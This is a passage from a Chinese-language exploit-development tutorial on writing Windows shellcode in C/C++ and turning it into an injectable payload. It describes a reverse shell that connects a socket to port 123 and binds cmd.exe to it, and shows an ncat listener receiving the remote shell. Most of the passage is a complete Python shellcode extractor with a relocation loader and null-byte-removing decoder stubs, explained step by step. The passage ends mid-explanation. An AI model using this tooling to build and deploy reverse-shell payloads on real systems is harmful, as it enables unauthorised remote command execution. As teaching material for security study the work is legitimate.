1.创建套接字, 2.将套接字连接到127.0.0.1:123, 3.创建一个执行cmd.exe的进程, 4.将套接字附加到进程的标准输入,标准输出以及标准错误输出, 5.等待进程被终止, 6.当进程已经终止时,则终止当前线程。

第3点与第4点同时进行,第4点调用了CreateProcess, 攻击者可以连接到端口123上进行监听,一旦被成功连接,就可以通过套接字(socket),即TCP连接,与运行在远程机器中的cmd.exe进行交互。

安装ncat,运行cmd并在命令行上输入:

ncat -lvp 123

此时将会在端口123上监听.

接着回到Visual Studio 2013,选择Release,搭建项目并运行它。再回到ncat,你将观察到如下:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>

现在可以执行任意命令了。退出则输入exit。

main

得益于linker的选项

Function Order: function_order.txt

function_order.txt中的第一行仅有一行存在?entryPoint@@YAHXZ字符串,函数 entryPoint将首先被定位在shellcode中。

在源码中,linker决定了函数的顺序,因此我们可在任意函数前放入entryPoint 。main函数在源码中的最后部分,因此它会在shellcode的结尾处被链接。当描述映射文件时,我们将了解到这是如何实现的。

0x02 Python脚本

介绍

现在,含有shellcode的执行体已经准备就绪,我们需要一种提取并修复shellcode的方法。这并不容易,我已经编写了Python脚本来实现:

1.提取shellcode

2.处理字符串的重定位信息

3.通过移除null字节修复shellcode

使用 PyCharm (下载地址).

该脚本只有392行,但是它有些复杂,因此我将对其进行解释: 代码如下:

# Shellcode extractor by Massimiliano Tomassoli (2015)
 
import sys
import os
import datetime
import pefile
 
author = 'Massimiliano Tomassoli'
year = datetime.date.today().year
 
 
def dword_to_bytes(value):
    return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]
 
 
def bytes_to_dword(bytes):
    return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | \
           ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24)
 
 
def get_cstring(data, offset):
    '''
    Extracts a C string (i.e. null-terminated string) from data starting from offset.
    '''
    pos = data.find('\0', offset)
    if pos == -1:
        return None
    return data[offset:pos+1]
 
 
def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]
 
            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None
 
    return shellcode_len
 
 
def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
 
        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str
 
        return (shellcode, relocs, addr_to_strings)
 
    except WindowsError:
        print('[!] get_shellcode: Cannot open "%s"' % exe_file)
        return None
    except Exception as e:
        print('[!] get_shellcode: %s' % e.message)
        return None
 
 
def dword_to_string(dword):
    return ''.join([chr(x) for x in dword_to_bytes(dword)])
 
 
def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations
 
    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...
 
    delta = 21                                      # shellcode_start - here
 
    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]
 
    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)
 
    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])
 
    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)
 
 
def dump_shellcode(shellcode):
    '''
    Prints shellcode in C format ('\x12\x23...')
    '''
    shellcode_len = len(shellcode)
    sc_array = []
    bytes_per_row = 16
    for i in range(shellcode_len):
        pos = i % bytes_per_row
        str = ''
        if pos == 0:
            str += '"'
        str += '\\x%02x' % ord(shellcode[i])
        if i == shellcode_len - 1:
            str += '";\n'
        elif pos == bytes_per_row - 1:
            str += '"\n'
        sc_array.append(str)
    shellcode_str = ''.join(sc_array)
    print(shellcode_str)
 
 
def get_xor_values(value):
    '''
    Finds x and y such that:
    1) x xor y == value
    2) x and y doesn't contain null bytes
    Returns x and y as arrays of bytes starting from the lowest significant byte.
    '''
 
    # Finds a non-null missing bytes.
    bytes = dword_to_bytes(value)
    missing_byte = [b for b in range(1, 256) if b not in bytes][0]
 
    xor1 = [b ^ missing_byte for b in bytes]
    xor2 = [missing_byte] * 4
    return (xor1, xor2)
 
 
def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''
 
    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]
 
    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))
 
 
def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''
 
    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))
 
        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes += [missing_bytes[0], num_blocks]
                break
 
    if len(bytes_blocks) > 0x7f - 5:
        # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
        return None
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   ...
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])
 
    new_shellcode_pieces = []
    pos = 0
    for i in range(len(bytes_blocks) / 2):
        missing_char = chr(bytes_blocks[i*2])
        num_bytes = 254 * bytes_blocks[i*2 + 1]
        new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('\0', missing_char))
        pos += num_bytes
 
    return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces)
 
 
def main():
    print("Shellcode Extractor by %s (%d)\n" % (author, year))
 
    if len(sys.argv) != 3:
        print('Usage:\n' +
              '  %s <exe file> <map file>\n' % os.path.basename(sys.argv[0]))
        return
 
    exe_file = sys.argv[1]
    map_file = sys.argv[2]
 
    print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))
    shellcode_len = get_shellcode_len(map_file)
    if shellcode_len is None:
        return
    print('shellcode length: %d' % shellcode_len)
 
    print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))
    result = get_shellcode_and_relocs(exe_file, shellcode_len)
    if result is None:
        return
    (shellcode, relocs, addr_to_strings) = result
 
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
 
    if shellcode.find('\0') == -1:
        print('Unbelievable: the shellcode does not need to be fixed!')
        fixed_shellcode = shellcode
    else:
        # shellcode contains null bytes and needs to be fixed.
        print('Fixing the shellcode...')
        fixed_shellcode = get_fixed_shellcode_single_block(shellcode)
        if fixed_shellcode is None:             # if shellcode wasn't fixed...
            fixed_shellcode = get_fixed_shellcode(shellcode)
            if fixed_shellcode is None:
                print('[!] Cannot fix the shellcode')
 
    print('final shellcode length: %d\n' % len(fixed_shellcode))
    print('char shellcode[] = ')
    dump_shellcode(fixed_shellcode)
 
 
main()

映射文件以及shellcode长度

linker中使用如下选项来生成映射文件:

  • Debugging:

    • Generate Map File: Yes (/MAP)

告诉linker生成含有EXE结构的映射文件。

* Map File Name: mapfile

该映射文件主要用于判断shellcode长度。

这里是映射文件的相关部分:

shellcode

 Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

 Preferred load address is 00400000

 Start         Length     Name                   Class
 0001:00000000 00000a9cH .text$mn                CODE
 0002:00000000 00000094H .idata$5                DATA
 0002:00000094 00000004H .CRT$XCA                DATA
 0002:00000098 00000004H .CRT$XCAA               DATA
 0002:0000009c 00000004H .CRT$XCZ                DATA
 0002:000000a0 00000004H .CRT$XIA                DATA
 0002:000000a4 00000004H .CRT$XIAA               DATA
 0002:000000a8 00000004H .CRT$XIC                DATA
 0002:000000ac 00000004H .CRT$XIY                DATA
 0002:000000b0 00000004H .CRT$XIZ                DATA
 0002:000000c0 000000a8H .rdata                  DATA
 0002:00000168 00000084H .rdata$debug            DATA
 0002:000001f0 00000004H .rdata$sxdata           DATA
 0002:000001f4 00000004H .rtc$IAA                DATA
 0002:000001f8 00000004H .rtc$IZZ                DATA
 0002:000001fc 00000004H .rtc$TAA                DATA
 0002:00000200 00000004H .rtc$TZZ                DATA
 0002:00000208 0000005cH .xdata$x                DATA
 0002:00000264 00000000H .edata                  DATA
 0002:00000264 00000028H .idata$2                DATA
 0002:0000028c 00000014H .idata$3                DATA
 0002:000002a0 00000094H .idata$4                DATA
 0002:00000334 0000027eH .idata$6                DATA
 0003:00000000 00000020H .data                   DATA
 0003:00000020 00000364H .bss                    DATA
 0004:00000000 00000058H .rsrc$01                DATA
 0004:00000060 00000180H .rsrc$02                DATA

  Address         Publics by Value              Rva+Base       Lib:Object

 0000:00000000       ___guard_fids_table        00000000     <absolute>
 0000:00000000       ___guard_fids_count        00000000     <absolute>
 0000:00000000       ___guard_flags             00000000     <absolute>
 0000:00000001       ___safe_se_handler_count   00000001     <absolute>
 0000:00000000       ___ImageBase               00400000     <linker-defined>
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:000001a1       ?getHash@@[email protected]         004011a1 f   shellcode.obj
 0001:000001be       ?getProcAddrByHash@@[email protected] 004011be f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
 0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj
 0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
 0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
<snip>

从映射文件的开头得知,section 1.text节,它含有代码:

Start         Length     Name                   Class
0001:00000000 00000a9cH .text$mn                CODE

第二部分表明 .text节起始于 ?entryPoint@@YAHXZ,这是我们的entryPoint函数,最后一个函数是函数main(这里被称作_main)。因为main函数在偏移0x266上,并且entryPoint函数位于``,我们的shellcode起始于.text节的开头,并且长度为0x266字节。

使用python实现:

def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]
 
            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None
 
    return shellcode_len

提取 shellcode

这部分非常容易理解,我们知道shellcode的长度并且知道shellcode被定位在.text节的起始部分。代码如下:

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                <snip>
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
<snip>

我使用了模块pefile (下载地址). 相关的部分是if语句体。

字符串和.rdata

正如之前所说的,c/c++代码可能含有字符串。例如,我们的shellcode含有如下代码:

My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

字符串cmd.exe被定位在.rdata节中,该节是一个只读的含有数据(已被初始化)的节。该代码对字符串进行绝对地址引用。

00241152 50                   push        eax  
00241153 8D 44 24 5C          lea         eax,[esp+5Ch]  
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h  
00241162 50                   push        eax  
00241163 52                   push        edx  
00241164 52                   push        edx  
00241165 52                   push        edx  
00241166 6A 01                push        1  
00241168 52                   push        edx  
00241169 52                   push        edx  
0024116A 68 18 21 24 00       push        242118h         <------------------------
0024116F 52                   push        edx  
00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi  
00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi  
0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi  
00241185 FF 54 24 34          call        dword ptr [esp+34h]

正如我们观察到的,cmd.exe的绝对地址是242118h。注意该地址是push指令的一部分并且该绝对地址被定位在了24116Bh。如果我们用某个文件编辑器检测文件cmd.exe,我们看到如下:

56A: 68 18 21 40 00           push        000402118h

在文件中56Ah是偏移量。因为image base的偏移量为400000h,所以对应的虚拟地址是40116A。在内存中,这应该是执行体被加载的首选的(preferred)地址。执行体在指令中的绝对地址是402118h, 如果执行体在首选的基地址上被加载,即表明已正确执行。然而,如果执行体在不同的基地址上被加载,那么需要修复指令。Windows如何知道执行体含有需要被修复的地址?PE文件含有一个相对目录(Relocation Directory),在我们的案例中它指向.reloc节。该相对目录中包含所有需要被修复的位置上的RVA

可以检查该目录并寻找如下所描述的位置上的地址

1.在shellcode中含有的(即从.text:0到末尾,main函数除外), 2.含有.rdata中的数据指针。

例如,在其他地址中,Relocation Directory将包含位于指令push 402118h的后四个字节的地址40116Bh。这些字节构成了地址402118h,它指向在.rdata中的字符串cmd.exe(起始于地址402000h)。

观察函数get_shellcode_and_relocs。在第一部分我们提取.rdata节:

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                <snip>
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

相关部分是elif的语句体。

接着分析重定位部分,在我们的shellcode中寻找地址并从.rdata中提取被那些地址引用的以null结尾的字符串。

正如我们已经说过的,我们只关注shellcode中的地址。这里是函数get_shellcode_and_relocs的相关部分:

# Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str
 
        return (shellcode, relocs, addr_to_strings)

pe.DIRECTORY_ENTRY_BASERELOC是一个数据结构表,它含有一个重定位表的入口。首先检查当前重定位信息是否在shellcode中。如果是,则进行如下操作:

1.将与shellcode的起始地址有关的重定位信息的偏移追加到 relocs

2.从shellcode中提取在已经发现的偏移上的DWORD值,并在.rdata中检查该指向数据的DWORD值;

3.从.rdata中提取起始于我们在(2)中发现的以null结尾的字符串;

4.将字符串添加到addr_to_strings

注意:

i.relocs含有在shellcode中重定位信息的偏移,即在需要被修复的shellcode中的DWORD值的偏移,以便它们指向字符串;

ii.addr_to_strings相当于一个与在(2)中被发现的字符串所在地址相关联的字典。

将loader添加到shellcode

方法是将被包含在addr_to_strings中的字符串添加到我们shellcode的尾部,然后让我们的代码引用那些字符串。

不幸的是,代码->字符串的链接过程必须在运行时完成,因为我们不知道shellcode的起始地址,那么我们需要准备一个在运行时修复shellcode的“loader”。这是转化后的shellcode结构:

enter image description here

OffX是指向原shellcode中重定位信息的DWORD值,它们需要被修复。loader将修复这些地址来让它们指向正确的字符串strX。 试图理解以下代码来了解实现原理:

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations
 
    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...
 
    delta = 21                                      # shellcode_start - here
 
    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]
 
    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)
 
    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])
 
    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)

观察loader

CALL here                   ; PUSH EIP+5; JMP here
  here:
    POP ESI                     ; ESI = address of "here"
    MOV EDI, ESI                ; EDI = address of "here"
    ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1
    MOV ECX, len(relocs)        ; ECX = number of locations to fix
    CLD                         ; tells LODSD to go forwards
  again:
    LODSD                       ; EAX = offX; ESI += 4
    ADD [EDI+EAX], EDI          ; fixes location within shellcode
    LOOP again                  ; DEC ECX; if ECX > 0 then JMP again
  shellcode_start:
    <shellcode>
  relocs:
    off1|off2|...
    str1|str2|...

首先,使用CALL来获取here在内存中的绝对地址。loader使用该信息对原shellcode中的偏移进行修复。ESI指向off1,因此使用LODSD来逐一读取偏移。该指令

ADD [EDI+EAX], EDI

用于修复shellcode中的地址。EAX是当前的offXoffX是与here相关的地址偏移 。这意味着EDI+EAX是那个位置上的绝对地址。DWORD值在那个地址上包含相对于here的字符串偏移。通过将EDI添加到那个DWORD值,我们将该DWORD值转换为该字符串的绝对地址。当loader已经执行完毕时,shellcode已被修复,同时也被成功执行。

总结,如果存在重定位信息,那么会调用add_loader_to_shellcode。可在main函数中观察到:

<snip>
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
<snip>

shellcode中移除null字节 (I)

编写如下两个函数来删去null字节。

1.get_fixed_shellcode_single_block
2.get_fixed_shellcode

可以试试使用第一个函数生成更短的代码,但是这样做不一定可被执行。但是如果使用第二个函数生成更长的代码,则必定可被执行。

首先观察get_fixed_shellcode_single_block函数,该函数的定义如下:

def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''
 
    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]
 
    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))

逐字节地分析shellcode并了解下这是否为被忽略的值,即从不出现在shellcode中的值。我们来了解下值0x14.如果我们用该值替换在shellcode中的每个0x00,那么shellcode将不再含有null字节,但是会因为被修改了而无法执行。最后是将一些decoder添加到shellcode,在运行时时,在原shellcode被执行前将重置null字节。如下:

CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop1:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode
  CMP AL, <missing byte>                      ; is AL the special byte?
